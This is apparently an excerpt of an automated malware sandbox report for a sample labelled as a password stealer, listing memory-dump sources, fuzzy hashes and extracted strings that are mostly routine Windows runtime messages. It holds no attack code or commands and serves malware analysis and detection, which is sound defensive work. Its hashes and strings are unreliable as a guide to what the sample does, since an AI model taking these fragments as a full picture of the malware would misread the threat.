                            • Opcode Fuzzy Hash: f4ef28503a95eed61dffbcc1fc42a6778f748af5b4dc5d15fd22b601a5288ad0
                            • Instruction Fuzzy Hash: 25018F71A10209EFDB00DFAAD440AAEB7F8FF58300F10402EFA00EB350DA349A01CBA0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                            • Instruction ID: 84b34972989f37255d172d723e254d14be0cbc27d5f44bdf11df8d178c5bddbe
                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                            • Instruction Fuzzy Hash: 70F021332046339FD772579E48C0B6BA5959FF5A64F9B003BF2059B360C9708D0257D0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                            • Instruction Fuzzy Hash: 2FD01236100248EFCF01DF41C890D9A772AFBD8710F108019FD19076108A31ED62DA50
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                            • Instruction ID: fe60abdd46e260a110d43e5c9a4b7b4e2b59edcf35f4c24369ffb2ccaf69ad40
                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                            • Instruction Fuzzy Hash: 1BC04879701A428FDF16DF6AD294F9977E4FB54B40F254898E805CBB22E625EC02CA10
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fd84632e7a69bed46eebd612467a354302e0796bf059af927783eeb53e602648
                            • Instruction ID: 5a72633ad7c9e3be4d09724c5b257a3283e8634c64c85065163972c7c56c2fab
                            • Opcode Fuzzy Hash: fd84632e7a69bed46eebd612467a354302e0796bf059af927783eeb53e602648
                            • Instruction Fuzzy Hash: C9900231A05C00529141719848849464045B7E0311B59C411E0424998CCA548A965361
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1c0c761174905b315ccd4c091fc42fd9933285cef9451b3d1318c2d79c9ae10
                            • Instruction ID: 5ce39958b90f9cec41714bf1e5a3668bd46edf3c1d56514b6630a8b2ac5053ba
                            • Opcode Fuzzy Hash: e1c0c761174905b315ccd4c091fc42fd9933285cef9451b3d1318c2d79c9ae10
                            • Instruction Fuzzy Hash: B4900261A01900824141719848048066045B7E1311399C515A05549A4CC65889959369
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 050120e8aa264e05e1837671ef2763d40cd4b6e468570d517886b8e3833bdbaf
                            • Instruction ID: 4a9b024d9579f61ac279025dd77b72fb597ad2916f1ce5cbc3ddc436ceeb35f1
                            • Opcode Fuzzy Hash: 050120e8aa264e05e1837671ef2763d40cd4b6e468570d517886b8e3833bdbaf
                            • Instruction Fuzzy Hash: 5490023160584882D14171984404E460055A7D0315F59C411A0064AD8DD6658E95B761
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0dc71e967edd1b59037daabe009c62debe830c23881582b93300dbeaf1893073
                            • Instruction ID: 770c60fb024a703665910efa5cb4667a73b9a3455789c4993a03e24047f2942d
                            • Opcode Fuzzy Hash: 0dc71e967edd1b59037daabe009c62debe830c23881582b93300dbeaf1893073
                            • Instruction Fuzzy Hash: 9890023160180842D18171984404A4A0045A7D1311F99C415A0025A98DCA558B9977A1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4e0bce032cfa49f8804ef0e2507e5820d9751f2e0f638c193b5c4c52d207bc17
                            • Instruction ID: a45b8fe9fb27ef2e18d7858f43b7f35a115fdb14fb2d0753e4b80327d2d1ccfb
                            • Opcode Fuzzy Hash: 4e0bce032cfa49f8804ef0e2507e5820d9751f2e0f638c193b5c4c52d207bc17
                            • Instruction Fuzzy Hash: 5390023160180842D10571984804A860045A7D0311F59C411A6024A99ED6A589D17231
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 62a0e22784d6f33af97f096e4142f72360e7466c47c13c77f7006e5c36c14dd4
                            • Instruction ID: 3f69722a6f6435c92c46f249e87e8efd62f73403341312b3a399803cc8fc8ebf
                            • Opcode Fuzzy Hash: 62a0e22784d6f33af97f096e4142f72360e7466c47c13c77f7006e5c36c14dd4
                            • Instruction Fuzzy Hash: 44900231A0580842D15171984414B460045A7D0311F59C411A0024A98DC7958B9577A1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 889521370f8f4e692c6b00cbba25733dfebb39b737f82df9345d5ed0683db6f3
                            • Instruction ID: b82cf40219af77037f62a11e412aa8e34192ee5ebfc75363f10ba8ada2df228a
                            • Opcode Fuzzy Hash: 889521370f8f4e692c6b00cbba25733dfebb39b737f82df9345d5ed0683db6f3
                            • Instruction Fuzzy Hash: A5900225611800430106B59807049070086A7D5361359C421F1015994CD66189A15221
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 579a0d47d7b3b74873c25842ab4b3e8753cbf2ad09d82a45db18106fbc36211b
                            • Instruction ID: e0da3d14421b808812d0f2081586d4011dd39c029085a0ee038fa4d8f8c3d428
                            • Opcode Fuzzy Hash: 579a0d47d7b3b74873c25842ab4b3e8753cbf2ad09d82a45db18106fbc36211b
                            • Instruction Fuzzy Hash: 0E900225621800420146B598060490B0485B7D6361399C415F14169D4CC66189A55321
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5c7c1bf886149e5f8bd07a49267a1eea9a9894b31f367be807e2758d8bca8cbc
                            • Instruction ID: 5a6fe7f7d7d2218d9de5fe0758293e3fcfbb23a6eed50d0e73dfcf3978bf892d
                            • Opcode Fuzzy Hash: 5c7c1bf886149e5f8bd07a49267a1eea9a9894b31f367be807e2758d8bca8cbc
                            • Instruction Fuzzy Hash: 299002A1601940D24501B2988404F0A4545A7E0211B59C416E10549A4CC56589919235
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fdbcce71489434a6491ddd3708e188f74c768fef43ddc08bbda97350bd05dde9
                            • Instruction ID: 2983fdb47fd9feea7678ce0786779104cb87fe795b788c8c0478aec7be0559bb
                            • Opcode Fuzzy Hash: fdbcce71489434a6491ddd3708e188f74c768fef43ddc08bbda97350bd05dde9
                            • Instruction Fuzzy Hash: F990022160584482D10175985408E060045A7D0215F59D411A10649D9DC6758991A231
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35a8bf2a8686ded7913e1e6c8849bcf31c362e1dcb0c58d4473c80c565fdde67
                            • Instruction ID: 0848207a0cf572abfc14a650ba87e834b28dca6d785cf466bf5d55eda2a72050
                            • Opcode Fuzzy Hash: 35a8bf2a8686ded7913e1e6c8849bcf31c362e1dcb0c58d4473c80c565fdde67
                            • Instruction Fuzzy Hash: FF90022961380042D18171985408A0A0045A7D1212F99D815A001599CCC95589A95321
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ecfd72dc5801bd679b2d7132a64ad9339a1a57dbf0f0530c178f984aa526ea7
                            • Instruction ID: 24dc2f96ec203673ee641e1f35c6eb0675f59c52e33e28cb5886b6d03ea3c671
                            • Opcode Fuzzy Hash: 6ecfd72dc5801bd679b2d7132a64ad9339a1a57dbf0f0530c178f984aa526ea7
                            • Instruction Fuzzy Hash: 8C90022170180043D14171985418A064045F7E1311F59D411E0414998CD95589965322
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae0fedd2e4e84722eed42206d302728060f346a5f043d78460607cfc5d5842b7
                            • Instruction ID: 10fbecab2ba737432e042b9a33bb5cb1c2757aeabe43d21294ea069c273aa422
                            • Opcode Fuzzy Hash: ae0fedd2e4e84722eed42206d302728060f346a5f043d78460607cfc5d5842b7
                            • Instruction Fuzzy Hash: C5900221642841925546B19844049074046B7E0251799C412A1414D94CC5669996D721
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eb16a86476deb38995ca0ba3abd00109ab41d8f590fe12ec5186e7c43c6b03f1
                            • Instruction ID: 3263676cbb652afefe6c1d024d29a8f700b69f3678942a0c627c5845464ff987
                            • Opcode Fuzzy Hash: eb16a86476deb38995ca0ba3abd00109ab41d8f590fe12ec5186e7c43c6b03f1
                            • Instruction Fuzzy Hash: 1490023164180442D14271984404A060049B7D0251F99C412A0424998EC6958B96AB61
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cdf8e9ec94687043cfe4053fae60a64e18d0ecff14e2d1421d8e2036f54cf28f
                            • Instruction ID: 1cd6d0d0fb2ac24820ea6cd77663976be186b7b131fbc62fba79c2a6e3430509
                            • Opcode Fuzzy Hash: cdf8e9ec94687043cfe4053fae60a64e18d0ecff14e2d1421d8e2036f54cf28f
                            • Instruction Fuzzy Hash: BE90023160180882D10171984404F460045A7E0311F59C416A0124A98DC655C9917621
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ec2f48b5bd3a429d5384465110f3b0eedd29438e965adf89d878edff1717ce4f
                            • Instruction ID: db2a4868ae52197876320b0dfde5be7836d94d7f3fbfb3f156a073126dbb73f6
                            • Opcode Fuzzy Hash: ec2f48b5bd3a429d5384465110f3b0eedd29438e965adf89d878edff1717ce4f
                            • Instruction Fuzzy Hash: 01900221A0580442D14171985418B060055A7D0211F59D411A0024998DC6998B9567A1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b7a94689c7fdc61c13bb3957750b209ad7278daf62c2b2e5c11f75c2a743a93d
                            • Instruction ID: a19513ef98ba2aeff9519e0d6b81cd62cdd0ae0fb62b13148596fbd106a9a99d
                            • Opcode Fuzzy Hash: b7a94689c7fdc61c13bb3957750b209ad7278daf62c2b2e5c11f75c2a743a93d
                            • Instruction Fuzzy Hash: CE90023160180443D10171985508B070045A7D0211F59D811A042499CDD69689916221
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e1d4771415f6588b40eadcf4cccbf196ec08020c99fff6468506eb6269655cc
                            • Instruction ID: b2524638cc029f14d6b0a10df1ca070e8d678933a61409ecc7d7bdff68852a50
                            • Opcode Fuzzy Hash: 3e1d4771415f6588b40eadcf4cccbf196ec08020c99fff6468506eb6269655cc
                            • Instruction Fuzzy Hash: 3290023160180442D10175D85408A460045A7E0311F59D411A5024999EC6A589D16231
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ff2e2e13e011ae51d812558d27c4b32f473310843cdb17c8dac27189ee0fab26
                            • Instruction ID: bc09ee9ec79343ae867c43b88348c4c75875a677b6a6e06942b7ce3e1fecf7bc
                            • Opcode Fuzzy Hash: ff2e2e13e011ae51d812558d27c4b32f473310843cdb17c8dac27189ee0fab26
                            • Instruction Fuzzy Hash: 3790026161180082D10571984404B060085A7E1211F59C412A2154998CC5698DA15225
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f0bf3ece4f57f39ce35efb1a714096fa241d883e3750a0f262e2957eca1d3533
                            • Instruction ID: b4d451d1821c86ee627be70dd53068eb642dcab5f3021bbb552fab49826c4b4d
                            • Opcode Fuzzy Hash: f0bf3ece4f57f39ce35efb1a714096fa241d883e3750a0f262e2957eca1d3533
                            • Instruction Fuzzy Hash: E390026174180482D10171984414F060045E7E1311F59C415E1064998DC659CD926226
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7387cb9d1a2f82791dbb09399784ebfe037f72b82bcf893dfc28f7c7b1ef457d
                            • Instruction ID: 7de400fc226f2ffbd76913ea0685519abfce274d9f9636fe12252db3cfc397bc
                            • Opcode Fuzzy Hash: 7387cb9d1a2f82791dbb09399784ebfe037f72b82bcf893dfc28f7c7b1ef457d
                            • Instruction Fuzzy Hash: 3D900221611C0082D20175A84C14F070045A7D0313F59C515A0154998CC95589A15621
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14cf017aa4b3751fc759626b9ff325d9b064450e47954acb9bde9364b07e805b
                            • Instruction ID: 5748f2f2a4b028dba12adb792e3322a9dd7c907efda320d0c370c15da695f6e2
                            • Opcode Fuzzy Hash: 14cf017aa4b3751fc759626b9ff325d9b064450e47954acb9bde9364b07e805b
                            • Instruction Fuzzy Hash: F2900231601C0442D10171984814B0B0045A7D0312F59C411A1164999DC66589916671
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e220690c38555ec95755d6a7417082c4030c15f412ebb94765bb096ae585a171
                            • Instruction ID: 2f1f241384e9911471bfe7e347d9673f1544a4148979b7de212be637eb8f8978
                            • Opcode Fuzzy Hash: e220690c38555ec95755d6a7417082c4030c15f412ebb94765bb096ae585a171
                            • Instruction Fuzzy Hash: 2D900231601C0442D10171984808B470045A7D0312F59C411A5164999EC6A5C9D16631
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7c3743fb3343330c1fb3ed3e51ab48ceac68adf128ad3e2ee0eb3e9ce144f88c
                            • Instruction ID: 9cf682f779a343683605a4eb31cb516e7728a3e0cc0b622166e57350ce669332
                            • Opcode Fuzzy Hash: 7c3743fb3343330c1fb3ed3e51ab48ceac68adf128ad3e2ee0eb3e9ce144f88c
                            • Instruction Fuzzy Hash: A1900221A0180082414171A88844D064045BBE1221759C521A0998994DC59989A55765
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e6bcb08eba592a800384ea9ea9318260b01d813eabc40b1bb4b4111a89685b2a
                            • Instruction ID: 31cf1192c2297f16d140c9654cb8653a0cedb80ff5ddbe287452ee176b69720f
                            • Opcode Fuzzy Hash: e6bcb08eba592a800384ea9ea9318260b01d813eabc40b1bb4b4111a89685b2a
                            • Instruction Fuzzy Hash: CD90022170180442D10371984414A060049E7D1355F99C412E1424999DC6658A93A232
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68ff36f7c4cfb43cec092ff8c3554c0e0ac7689c10b7add11439acd89cd86c43
                            • Instruction ID: fc9b1edb4dced70954e85db28c12b55880a397aaf4b08002f7d456b8937539f2
                            • Opcode Fuzzy Hash: 68ff36f7c4cfb43cec092ff8c3554c0e0ac7689c10b7add11439acd89cd86c43
                            • Instruction Fuzzy Hash: 45900261601C0443D14175984804A070045A7D0312F59C411A2064999ECA698D916235
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a38bba784c14c8720bcfd95417bcadfa48a58ef2d3e7bf81f085d3ab134ec5da
                            • Instruction ID: 7429217302594c32898772c2269a0ace5a995b1cb43b9eb1d247334657784146
                            • Opcode Fuzzy Hash: a38bba784c14c8720bcfd95417bcadfa48a58ef2d3e7bf81f085d3ab134ec5da
                            • Instruction Fuzzy Hash: 64900221A0180542D10271984404A16004AA7D0251F99C422A1024999ECA658AD2A231
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            Strings
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01524787
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01524725
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01524742
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01524655
                            • Execute=1, xrefs: 01524713
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015246FC
                            • ExecuteOptions, xrefs: 015246A0
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$[$]:%u
                            • API String ID: 48624451-2819853543
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015202BD
                            • RTL: Re-Waiting, xrefs: 0152031E
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015202E7
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            Strings
                            • RTL: Resource at %p, xrefs: 01527B8E
                            • RTL: Re-Waiting, xrefs: 01527BAC
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01527B7F
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0152728C
                            Strings
                            • RTL: Resource at %p, xrefs: 015272A3
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01527294
                            • RTL: Re-Waiting, xrefs: 015272C1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$]:%u
                            • API String ID: 48624451-3050659472
                            APIs
                            Strings
                            Memory Dump Source
